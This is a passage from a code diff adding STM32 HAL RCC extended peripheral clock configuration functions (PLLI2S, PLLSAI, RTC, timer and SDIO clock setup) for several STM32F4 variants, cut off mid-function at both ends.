(uint32_t)(HSI_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + + /* PLL_VCO Output = PLL_VCO Input * PLLN */ + vcooutput = (uint32_t)(vcoinput * (((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> 6U) & (RCC_PLLCFGR_PLLN >> 6U))); + /* I2S_CLK = PLL_VCO Output/PLLR */ + frequency = (uint32_t)(vcooutput /(((RCC->PLLCFGR & RCC_PLLCFGR_PLLR) >> 28U) & (RCC_PLLCFGR_PLLR >> 28U))); + break; + } + /* Check if I2S clock selection is HSI or HSE depending from PLL source Clock */ + case RCC_I2SAPB2CLKSOURCE_PLLSRC: + { + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + frequency = HSE_VALUE; + } + else + { + frequency = HSI_VALUE; + } + break; + } + /* Clock not enabled for I2S*/ + default: + { + frequency = 0U; + break; + } + } + break; + } + } + return frequency; +} +#endif /* STM32F446xx */ + +#if defined(STM32F469xx) || defined(STM32F479xx) +/** + * @brief Initializes the RCC extended peripherals clocks according to the specified + * parameters in the RCC_PeriphCLKInitTypeDef. + * @param PeriphClkInit pointer to an RCC_PeriphCLKInitTypeDef structure that + * contains the configuration information for the Extended Peripherals + * clocks(I2S, SAI, LTDC, RTC and TIM). + * + * @note Care must be taken when HAL_RCCEx_PeriphCLKConfig() is used to select + * the RTC clock source; in this case the Backup domain will be reset in + * order to modify the RTC Clock source, as consequence RTC registers (including + * the backup registers) and RCC_BDCR register are set to their reset values. + * + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RCCEx_PeriphCLKConfig(RCC_PeriphCLKInitTypeDef *PeriphClkInit) +{ + uint32_t tickstart = 0U; + uint32_t tmpreg1 = 0U; + uint32_t pllsaip = 0U; + uint32_t pllsaiq = 0U; + uint32_t pllsair = 0U; + + /* Check the parameters */ + assert_param(IS_RCC_PERIPHCLOCK(PeriphClkInit->PeriphClockSelection)); + + /*--------------------------- CLK48 Configuration --------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_CLK48) == RCC_PERIPHCLK_CLK48) + { + /* Check the parameters */ + assert_param(IS_RCC_CLK48CLKSOURCE(PeriphClkInit->Clk48ClockSelection)); + + /* Configure the CLK48 clock source */ + __HAL_RCC_CLK48_CONFIG(PeriphClkInit->Clk48ClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*------------------------------ SDIO Configuration ------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SDIO) == RCC_PERIPHCLK_SDIO) + { + /* Check the parameters */ + assert_param(IS_RCC_SDIOCLKSOURCE(PeriphClkInit->SdioClockSelection)); + + /* Configure the SDIO clock source */ + __HAL_RCC_SDIO_CONFIG(PeriphClkInit->SdioClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*----------------------- SAI/I2S Configuration (PLLI2S) -------------------*/ + /*------------------- Common configuration SAI/I2S -------------------------*/ + /* In Case of SAI or I2S Clock Configuration through PLLI2S, PLLI2SN division + factor is common parameters for both peripherals */ + if((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S) == RCC_PERIPHCLK_I2S) || + (((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI_PLLI2S) == RCC_PERIPHCLK_SAI_PLLI2S) || + (((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_PLLI2S) == RCC_PERIPHCLK_PLLI2S)) + { + /* check for Parameters */ + assert_param(IS_RCC_PLLI2SN_VALUE(PeriphClkInit->PLLI2S.PLLI2SN)); + + /* Disable the PLLI2S */ + __HAL_RCC_PLLI2S_DISABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLI2S is disabled */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLI2SRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > PLLI2S_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + + /*---------------------- I2S configuration -------------------------------*/ + /* In Case of I2S Clock Configuration through PLLI2S, PLLI2SR must be added + only for I2S configuration */ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S) == (RCC_PERIPHCLK_I2S)) + { + /* check for Parameters */ + assert_param(IS_RCC_PLLI2SR_VALUE(PeriphClkInit->PLLI2S.PLLI2SR)); + /* Configure the PLLI2S division factors */ + /* PLLI2S_VCO = f(VCO clock) = f(PLLI2S clock input) x (PLLI2SN/PLLM) */ + /* I2SCLK = f(PLLI2S clock output) = f(VCO clock) / PLLI2SR */ + __HAL_RCC_PLLI2S_CONFIG(PeriphClkInit->PLLI2S.PLLI2SN , PeriphClkInit->PLLI2S.PLLI2SR); + } + + /*---------------------------- SAI configuration -------------------------*/ + /* In Case of SAI Clock Configuration through PLLI2S, PLLI2SQ and PLLI2S_DIVQ must + be added only for SAI configuration */ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI_PLLI2S) == (RCC_PERIPHCLK_SAI_PLLI2S)) + { + /* Check the PLLI2S division factors */ + assert_param(IS_RCC_PLLI2SQ_VALUE(PeriphClkInit->PLLI2S.PLLI2SQ)); + assert_param(IS_RCC_PLLI2S_DIVQ_VALUE(PeriphClkInit->PLLI2SDivQ)); + + /* Read PLLI2SR value from PLLI2SCFGR register (this value is not need for SAI configuration) */ + tmpreg1 = ((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> RCC_PLLI2SCFGR_PLLI2SR_Pos); + /* Configure the PLLI2S division factors */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLM */ + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + /* SAI_CLK(first level) = PLLI2S_VCO Output/PLLI2SQ */ + __HAL_RCC_PLLI2S_SAICLK_CONFIG(PeriphClkInit->PLLI2S.PLLI2SN , PeriphClkInit->PLLI2S.PLLI2SQ , tmpreg1); + /* SAI_CLK_x = SAI_CLK(first level)/PLLI2SDIVQ */ + __HAL_RCC_PLLI2S_PLLSAICLKDIVQ_CONFIG(PeriphClkInit->PLLI2SDivQ); + } + + /*----------------- In Case of PLLI2S is just selected -----------------*/ + if((PeriphClkInit->PeriphClockSelection & RCC_PERIPHCLK_PLLI2S) == RCC_PERIPHCLK_PLLI2S) + { + /* Check for Parameters */ + assert_param(IS_RCC_PLLI2SQ_VALUE(PeriphClkInit->PLLI2S.PLLI2SQ)); + assert_param(IS_RCC_PLLI2SR_VALUE(PeriphClkInit->PLLI2S.PLLI2SR)); + + /* Configure the PLLI2S multiplication and division factors */ + __HAL_RCC_PLLI2S_SAICLK_CONFIG(PeriphClkInit->PLLI2S.PLLI2SN, PeriphClkInit->PLLI2S.PLLI2SQ, PeriphClkInit->PLLI2S.PLLI2SR); + } + + /* Enable the PLLI2S */ + __HAL_RCC_PLLI2S_ENABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLI2S is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLI2SRDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > PLLI2S_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + } + /*--------------------------------------------------------------------------*/ + + /*----------------------- SAI/LTDC Configuration (PLLSAI) ------------------*/ + /*----------------------- Common configuration SAI/LTDC --------------------*/ + /* In Case of SAI, LTDC or CLK48 Clock Configuration through PLLSAI, PLLSAIN division + factor is common parameters for these peripherals */ + if((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI_PLLSAI) == RCC_PERIPHCLK_SAI_PLLSAI) || + (((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_LTDC) == RCC_PERIPHCLK_LTDC) || + ((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_CLK48) == RCC_PERIPHCLK_CLK48) && + (PeriphClkInit->Clk48ClockSelection == RCC_CLK48CLKSOURCE_PLLSAIP))) + { + /* Check the PLLSAI division factors */ + assert_param(IS_RCC_PLLSAIN_VALUE(PeriphClkInit->PLLSAI.PLLSAIN)); + + /* Disable PLLSAI Clock */ + __HAL_RCC_PLLSAI_DISABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLSAI is disabled */ + while(__HAL_RCC_PLLSAI_GET_FLAG() != RESET) + { + if((HAL_GetTick() - tickstart ) > PLLSAI_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + + /*---------------------------- SAI configuration -------------------------*/ + /* In Case of SAI Clock Configuration through PLLSAI, PLLSAIQ and PLLSAI_DIVQ must + be added only for SAI configuration */ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAI_PLLSAI) == (RCC_PERIPHCLK_SAI_PLLSAI)) + { + assert_param(IS_RCC_PLLSAIQ_VALUE(PeriphClkInit->PLLSAI.PLLSAIQ)); + assert_param(IS_RCC_PLLSAI_DIVQ_VALUE(PeriphClkInit->PLLSAIDivQ)); + + /* Read PLLSAIP value from PLLSAICFGR register (this value is not needed for SAI configuration) */ + pllsaip = ((((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIP) >> RCC_PLLSAICFGR_PLLSAIP_Pos) + 1U) << 1U); + /* Read PLLSAIR value from PLLSAICFGR register (this value is not need for SAI configuration) */ + pllsair = ((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIR) >> RCC_PLLSAICFGR_PLLSAIR_Pos); + /* PLLSAI_VCO Input = PLL_SOURCE/PLLM */ + /* PLLSAI_VCO Output = PLLSAI_VCO Input * PLLSAIN */ + /* SAI_CLK(first level) = PLLSAI_VCO Output/PLLSAIQ */ + __HAL_RCC_PLLSAI_CONFIG(PeriphClkInit->PLLSAI.PLLSAIN, pllsaip, PeriphClkInit->PLLSAI.PLLSAIQ, pllsair); + /* SAI_CLK_x = SAI_CLK(first level)/PLLSAIDIVQ */ + __HAL_RCC_PLLSAI_PLLSAICLKDIVQ_CONFIG(PeriphClkInit->PLLSAIDivQ); + } + + /*---------------------------- LTDC configuration ------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_LTDC) == (RCC_PERIPHCLK_LTDC)) + { + assert_param(IS_RCC_PLLSAIR_VALUE(PeriphClkInit->PLLSAI.PLLSAIR)); + assert_param(IS_RCC_PLLSAI_DIVR_VALUE(PeriphClkInit->PLLSAIDivR)); + + /* Read PLLSAIP value from PLLSAICFGR register (this value is not needed for SAI configuration) */ + pllsaip = ((((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIP) >> RCC_PLLSAICFGR_PLLSAIP_Pos) + 1U) << 1U); + /* Read PLLSAIQ value from PLLSAICFGR register (this value is not need for SAI configuration) */ + pllsaiq = ((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIQ) >> RCC_PLLSAICFGR_PLLSAIQ_Pos); + /* PLLSAI_VCO Input = PLL_SOURCE/PLLM */ + /* PLLSAI_VCO Output = PLLSAI_VCO Input * PLLSAIN */ + /* LTDC_CLK(first level) = PLLSAI_VCO Output/PLLSAIR */ + __HAL_RCC_PLLSAI_CONFIG(PeriphClkInit->PLLSAI.PLLSAIN, pllsaip, pllsaiq, PeriphClkInit->PLLSAI.PLLSAIR); + /* LTDC_CLK = LTDC_CLK(first level)/PLLSAIDIVR */ + __HAL_RCC_PLLSAI_PLLSAICLKDIVR_CONFIG(PeriphClkInit->PLLSAIDivR); + } + + /*---------------------------- CLK48 configuration ------------------------*/ + /* Configure the PLLSAI when it is used as clock source for CLK48 */ + if((((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_CLK48) == (RCC_PERIPHCLK_CLK48)) && + (PeriphClkInit->Clk48ClockSelection == RCC_CLK48CLKSOURCE_PLLSAIP)) + { + assert_param(IS_RCC_PLLSAIP_VALUE(PeriphClkInit->PLLSAI.PLLSAIP)); + + /* Read PLLSAIQ value from PLLSAICFGR register (this value is not need for SAI configuration) */ + pllsaiq = ((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIQ) >> RCC_PLLSAICFGR_PLLSAIQ_Pos); + /* Read PLLSAIR value from PLLSAICFGR register (this value is not need for SAI configuration) */ + pllsair = ((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIR) >> RCC_PLLSAICFGR_PLLSAIR_Pos); + /* PLLSAI_VCO Input = PLL_SOURCE/PLLM */ + /* PLLSAI_VCO Output = PLLSAI_VCO Input * PLLSAIN */ + /* CLK48_CLK(first level) = PLLSAI_VCO Output/PLLSAIP */ + __HAL_RCC_PLLSAI_CONFIG(PeriphClkInit->PLLSAI.PLLSAIN, PeriphClkInit->PLLSAI.PLLSAIP, pllsaiq, pllsair); + } + + /* Enable PLLSAI Clock */ + __HAL_RCC_PLLSAI_ENABLE(); + /* Get tick */ + tickstart = HAL_GetTick(); + /* Wait till PLLSAI is ready */ + while(__HAL_RCC_PLLSAI_GET_FLAG() == RESET) + { + if((HAL_GetTick() - tickstart ) > PLLSAI_TIMEOUT_VALUE) + { + /* return in case of Timeout detected */ + return HAL_TIMEOUT; + } + } + } + + /*--------------------------------------------------------------------------*/ + + /*---------------------------- RTC configuration ---------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_RTC) == (RCC_PERIPHCLK_RTC)) + { + /* Check for RTC Parameters used to output RTCCLK */ + assert_param(IS_RCC_RTCCLKSOURCE(PeriphClkInit->RTCClockSelection)); + + /* Enable Power Clock*/ + __HAL_RCC_PWR_CLK_ENABLE(); + + /* Enable write access to Backup domain */ + PWR->CR |= PWR_CR_DBP; + + /* Get tick */ + tickstart = HAL_GetTick(); + + while((PWR->CR & PWR_CR_DBP) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_DBP_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + /* Reset the Backup domain only if the RTC Clock source selection is modified from reset value */ + tmpreg1 = (RCC->BDCR & RCC_BDCR_RTCSEL); + if((tmpreg1 != 0x00000000U) && ((tmpreg1) != (PeriphClkInit->RTCClockSelection & RCC_BDCR_RTCSEL))) + { + /* Store the content of BDCR register before the reset of Backup Domain */ + tmpreg1 = (RCC->BDCR & ~(RCC_BDCR_RTCSEL)); + /* RTC Clock selection can be changed only if the Backup Domain is reset */ + __HAL_RCC_BACKUPRESET_FORCE(); + __HAL_RCC_BACKUPRESET_RELEASE(); + /* Restore the Content of BDCR register */ + RCC->BDCR = tmpreg1; + + /* Wait for LSE reactivation if LSE was enable prior to Backup Domain reset */ + if(HAL_IS_BIT_SET(RCC->BDCR, RCC_BDCR_LSEON)) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till LSE is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSERDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_LSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + __HAL_RCC_RTC_CONFIG(PeriphClkInit->RTCClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*---------------------------- TIM configuration ---------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_TIM) == (RCC_PERIPHCLK_TIM)) + { + __HAL_RCC_TIMCLKPRESCALER(PeriphClkInit->TIMPresSelection); + } + return HAL_OK; +} + +/** + * @brief Configures the RCC_PeriphCLKInitTypeDef according to the internal + * RCC configuration registers. + * @param PeriphClkInit pointer to an RCC_PeriphCLKInitTypeDef structure that + * will be configured. + * @retval None + */ +void HAL_RCCEx_GetPeriphCLKConfig(RCC_PeriphCLKInitTypeDef *PeriphClkInit) +{ + uint32_t tempreg; + + /* Set all possible values for the extended clock type parameter------------*/ + PeriphClkInit->PeriphClockSelection = RCC_PERIPHCLK_I2S | RCC_PERIPHCLK_SAI_PLLSAI |\ + RCC_PERIPHCLK_SAI_PLLI2S | RCC_PERIPHCLK_LTDC |\ + RCC_PERIPHCLK_TIM | RCC_PERIPHCLK_RTC |\ + RCC_PERIPHCLK_CLK48 | RCC_PERIPHCLK_SDIO; + + /* Get the PLLI2S Clock configuration --------------------------------------*/ + PeriphClkInit->PLLI2S.PLLI2SN = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> RCC_PLLI2SCFGR_PLLI2SN_Pos); + PeriphClkInit->PLLI2S.PLLI2SR = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> RCC_PLLI2SCFGR_PLLI2SR_Pos); + PeriphClkInit->PLLI2S.PLLI2SQ = (uint32_t)((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SQ) >> RCC_PLLI2SCFGR_PLLI2SQ_Pos); + /* Get the PLLSAI Clock configuration --------------------------------------*/ + PeriphClkInit->PLLSAI.PLLSAIN = (uint32_t)((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIN) >> RCC_PLLSAICFGR_PLLSAIN_Pos); + PeriphClkInit->PLLSAI.PLLSAIR = (uint32_t)((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIR) >> RCC_PLLSAICFGR_PLLSAIR_Pos); + PeriphClkInit->PLLSAI.PLLSAIQ = (uint32_t)((RCC->PLLSAICFGR & RCC_PLLSAICFGR_PLLSAIQ) >> RCC_PLLSAICFGR_PLLSAIQ_Pos); + /* Get the PLLSAI/PLLI2S division factors ----------------------------------*/ + PeriphClkInit->PLLI2SDivQ = (uint32_t)((RCC->DCKCFGR & RCC_DCKCFGR_PLLI2SDIVQ) >> RCC_DCKCFGR_PLLI2SDIVQ_Pos); + PeriphClkInit->PLLSAIDivQ = (uint32_t)((RCC->DCKCFGR & RCC_DCKCFGR_PLLSAIDIVQ) >> RCC_DCKCFGR_PLLSAIDIVQ_Pos); + PeriphClkInit->PLLSAIDivR = (uint32_t)(RCC->DCKCFGR & RCC_DCKCFGR_PLLSAIDIVR); + /* Get the RTC Clock configuration -----------------------------------------*/ + tempreg = (RCC->CFGR & RCC_CFGR_RTCPRE); + PeriphClkInit->RTCClockSelection = (uint32_t)((tempreg) | (RCC->BDCR & RCC_BDCR_RTCSEL)); + + /* Get the CLK48 clock configuration -------------------------------------*/ + PeriphClkInit->Clk48ClockSelection = __HAL_RCC_GET_CLK48_SOURCE(); + + /* Get the SDIO clock configuration ----------------------------------------*/ + PeriphClkInit->SdioClockSelection = __HAL_RCC_GET_SDIO_SOURCE(); + + if ((RCC->DCKCFGR & RCC_DCKCFGR_TIMPRE) == RESET) + { + PeriphClkInit->TIMPresSelection = RCC_TIMPRES_DESACTIVATED; + } + else + { + PeriphClkInit->TIMPresSelection = RCC_TIMPRES_ACTIVATED; + } +} + +/** + * @brief Return the peripheral clock frequency for a given peripheral(SAI..) + * @note Return 0 if peripheral clock identifier not managed by this API + * @param PeriphClk Peripheral clock identifier + * This parameter can be one of the following values: + * @arg RCC_PERIPHCLK_I2S: I2S peripheral clock + * @retval Frequency in KHz + */ +uint32_t HAL_RCCEx_GetPeriphCLKFreq(uint32_t PeriphClk) +{ + /* This variable used to store the I2S clock frequency (value in Hz) */ + uint32_t frequency = 0U; + /* This variable used to store the VCO Input (value in Hz) */ + uint32_t vcoinput = 0U; + uint32_t srcclk = 0U; + /* This variable used to store the VCO Output (value in Hz) */ + uint32_t vcooutput = 0U; + switch (PeriphClk) + { + case RCC_PERIPHCLK_I2S: + { + /* Get the current I2S source */ + srcclk = __HAL_RCC_GET_I2S_SOURCE(); + switch (srcclk) + { + /* Check if I2S clock selection is External clock mapped on the I2S_CKIN pin used as I2S clock */ + case RCC_I2SCLKSOURCE_EXT: + { + /* Set the I2S clock to the external clock value */ + frequency = EXTERNAL_CLOCK_VALUE; + break; + } + /* Check if I2S clock selection is PLLI2S VCO output clock divided by PLLI2SR used as I2S clock */ + case RCC_I2SCLKSOURCE_PLLI2S: + { + /* Configure the PLLI2S division factor */ + /* PLLI2S_VCO Input = PLL_SOURCE/PLLI2SM */ + if((RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC) == RCC_PLLSOURCE_HSE) + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSE_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + else + { + /* Get the I2S source clock value */ + vcoinput = (uint32_t)(HSI_VALUE / (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM)); + } + + /* PLLI2S_VCO Output = PLLI2S_VCO Input * PLLI2SN */ + vcooutput = (uint32_t)(vcoinput * (((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SN) >> 6U) & (RCC_PLLI2SCFGR_PLLI2SN >> 6U))); + /* I2S_CLK = PLLI2S_VCO Output/PLLI2SR */ + frequency = (uint32_t)(vcooutput /(((RCC->PLLI2SCFGR & RCC_PLLI2SCFGR_PLLI2SR) >> 28U) & (RCC_PLLI2SCFGR_PLLI2SR >> 28U))); + break; + } + /* Clock not enabled for I2S*/ + default: + { + frequency = 0U; + break; + } + } + break; + } + } + return frequency; +} +#endif /* STM32F469xx || STM32F479xx */ + +#if defined(STM32F412Zx) || defined(STM32F412Vx) || defined(STM32F412Rx) || defined(STM32F412Cx) || defined(STM32F413xx) || defined(STM32F423xx) +/** + * @brief Initializes the RCC extended peripherals clocks according to the specified + * parameters in the RCC_PeriphCLKInitTypeDef. + * @param PeriphClkInit pointer to an RCC_PeriphCLKInitTypeDef structure that + * contains the configuration information for the Extended Peripherals + * clocks(I2S, LTDC RTC and TIM). + * + * @note Care must be taken when HAL_RCCEx_PeriphCLKConfig() is used to select + * the RTC clock source; in this case the Backup domain will be reset in + * order to modify the RTC Clock source, as consequence RTC registers (including + * the backup registers) and RCC_BDCR register are set to their reset values. + * + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RCCEx_PeriphCLKConfig(RCC_PeriphCLKInitTypeDef *PeriphClkInit) +{ + uint32_t tickstart = 0U; + uint32_t tmpreg1 = 0U; +#if defined(STM32F413xx) || defined(STM32F423xx) + uint32_t plli2sq = 0U; +#endif /* STM32F413xx || STM32F423xx */ + uint32_t plli2sused = 0U; + + /* Check the peripheral clock selection parameters */ + assert_param(IS_RCC_PERIPHCLOCK(PeriphClkInit->PeriphClockSelection)); + + /*----------------------------------- I2S APB1 configuration ---------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S_APB1) == (RCC_PERIPHCLK_I2S_APB1)) + { + /* Check the parameters */ + assert_param(IS_RCC_I2SAPB1CLKSOURCE(PeriphClkInit->I2sApb1ClockSelection)); + + /* Configure I2S Clock source */ + __HAL_RCC_I2S_APB1_CONFIG(PeriphClkInit->I2sApb1ClockSelection); + /* Enable the PLLI2S when it's used as clock source for I2S */ + if(PeriphClkInit->I2sApb1ClockSelection == RCC_I2SAPB1CLKSOURCE_PLLI2S) + { + plli2sused = 1U; + } + } + /*--------------------------------------------------------------------------*/ + + /*----------------------------------- I2S APB2 configuration ---------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_I2S_APB2) == (RCC_PERIPHCLK_I2S_APB2)) + { + /* Check the parameters */ + assert_param(IS_RCC_I2SAPB2CLKSOURCE(PeriphClkInit->I2sApb2ClockSelection)); + + /* Configure I2S Clock source */ + __HAL_RCC_I2S_APB2_CONFIG(PeriphClkInit->I2sApb2ClockSelection); + /* Enable the PLLI2S when it's used as clock source for I2S */ + if(PeriphClkInit->I2sApb2ClockSelection == RCC_I2SAPB2CLKSOURCE_PLLI2S) + { + plli2sused = 1U; + } + } + /*--------------------------------------------------------------------------*/ + +#if defined(STM32F413xx) || defined(STM32F423xx) + /*----------------------- SAI1 Block A configuration -----------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAIA) == (RCC_PERIPHCLK_SAIA)) + { + /* Check the parameters */ + assert_param(IS_RCC_SAIACLKSOURCE(PeriphClkInit->SaiAClockSelection)); + + /* Configure SAI1 Clock source */ + __HAL_RCC_SAI_BLOCKACLKSOURCE_CONFIG(PeriphClkInit->SaiAClockSelection); + /* Enable the PLLI2S when it's used as clock source for SAI */ + if(PeriphClkInit->SaiAClockSelection == RCC_SAIACLKSOURCE_PLLI2SR) + { + plli2sused = 1U; + } + /* Enable the PLLSAI when it's used as clock source for SAI */ + if(PeriphClkInit->SaiAClockSelection == RCC_SAIACLKSOURCE_PLLR) + { + /* Check for PLL/DIVR parameters */ + assert_param(IS_RCC_PLL_DIVR_VALUE(PeriphClkInit->PLLDivR)); + + /* SAI_CLK_x = SAI_CLK(first level)/PLLDIVR */ + __HAL_RCC_PLL_PLLSAICLKDIVR_CONFIG(PeriphClkInit->PLLDivR); + } + } + /*--------------------------------------------------------------------------*/ + + /*---------------------- SAI1 Block B configuration ------------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SAIB) == (RCC_PERIPHCLK_SAIB)) + { + /* Check the parameters */ + assert_param(IS_RCC_SAIBCLKSOURCE(PeriphClkInit->SaiBClockSelection)); + + /* Configure SAI1 Clock source */ + __HAL_RCC_SAI_BLOCKBCLKSOURCE_CONFIG(PeriphClkInit->SaiBClockSelection); + /* Enable the PLLI2S when it's used as clock source for SAI */ + if(PeriphClkInit->SaiBClockSelection == RCC_SAIBCLKSOURCE_PLLI2SR) + { + plli2sused = 1U; + } + /* Enable the PLLSAI when it's used as clock source for SAI */ + if(PeriphClkInit->SaiBClockSelection == RCC_SAIBCLKSOURCE_PLLR) + { + /* Check for PLL/DIVR parameters */ + assert_param(IS_RCC_PLL_DIVR_VALUE(PeriphClkInit->PLLDivR)); + + /* SAI_CLK_x = SAI_CLK(first level)/PLLDIVR */ + __HAL_RCC_PLL_PLLSAICLKDIVR_CONFIG(PeriphClkInit->PLLDivR); + } + } + /*--------------------------------------------------------------------------*/ +#endif /* STM32F413xx || STM32F423xx */ + + /*------------------------------------ RTC configuration -------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_RTC) == (RCC_PERIPHCLK_RTC)) + { + /* Check for RTC Parameters used to output RTCCLK */ + assert_param(IS_RCC_RTCCLKSOURCE(PeriphClkInit->RTCClockSelection)); + + /* Enable Power Clock*/ + __HAL_RCC_PWR_CLK_ENABLE(); + + /* Enable write access to Backup domain */ + PWR->CR |= PWR_CR_DBP; + + /* Get tick */ + tickstart = HAL_GetTick(); + + while((PWR->CR & PWR_CR_DBP) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_DBP_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + /* Reset the Backup domain only if the RTC Clock source selection is modified from reset value */ + tmpreg1 = (RCC->BDCR & RCC_BDCR_RTCSEL); + if((tmpreg1 != 0x00000000U) && ((tmpreg1) != (PeriphClkInit->RTCClockSelection & RCC_BDCR_RTCSEL))) + { + /* Store the content of BDCR register before the reset of Backup Domain */ + tmpreg1 = (RCC->BDCR & ~(RCC_BDCR_RTCSEL)); + /* RTC Clock selection can be changed only if the Backup Domain is reset */ + __HAL_RCC_BACKUPRESET_FORCE(); + __HAL_RCC_BACKUPRESET_RELEASE(); + /* Restore the Content of BDCR register */ + RCC->BDCR = tmpreg1; + + /* Wait for LSE reactivation if LSE was enable prior to Backup Domain reset */ + if(HAL_IS_BIT_SET(RCC->BDCR, RCC_BDCR_LSEON)) + { + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait till LSE is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSERDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_LSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + __HAL_RCC_RTC_CONFIG(PeriphClkInit->RTCClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*------------------------------------ TIM configuration -------------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_TIM) == (RCC_PERIPHCLK_TIM)) + { + /* Configure Timer Prescaler */ + __HAL_RCC_TIMCLKPRESCALER(PeriphClkInit->TIMPresSelection); + } + /*--------------------------------------------------------------------------*/ + + /*------------------------------------- FMPI2C1 Configuration --------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_FMPI2C1) == RCC_PERIPHCLK_FMPI2C1) + { + /* Check the parameters */ + assert_param(IS_RCC_FMPI2C1CLKSOURCE(PeriphClkInit->Fmpi2c1ClockSelection)); + + /* Configure the FMPI2C1 clock source */ + __HAL_RCC_FMPI2C1_CONFIG(PeriphClkInit->Fmpi2c1ClockSelection); + } + /*--------------------------------------------------------------------------*/ + + /*------------------------------------- CLK48 Configuration ----------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_CLK48) == RCC_PERIPHCLK_CLK48) + { + /* Check the parameters */ + assert_param(IS_RCC_CLK48CLKSOURCE(PeriphClkInit->Clk48ClockSelection)); + + /* Configure the SDIO clock source */ + __HAL_RCC_CLK48_CONFIG(PeriphClkInit->Clk48ClockSelection); + + /* Enable the PLLI2S when it's used as clock source for CLK48 */ + if(PeriphClkInit->Clk48ClockSelection == RCC_CLK48CLKSOURCE_PLLI2SQ) + { + plli2sused = 1U; + } + } + /*--------------------------------------------------------------------------*/ + + /*------------------------------------- SDIO Configuration -----------------*/ + if(((PeriphClkInit->PeriphClockSelection) & RCC_PERIPHCLK_SDIO) == RCC_PERIPHCLK_SDIO) + { + /* Check the parameters */ + assert_param(IS_RCC_SDIOCLKSOURCE(PeriphClkInit->SdioClockSelection)); + + /* Configure the SDIO clock source */ + 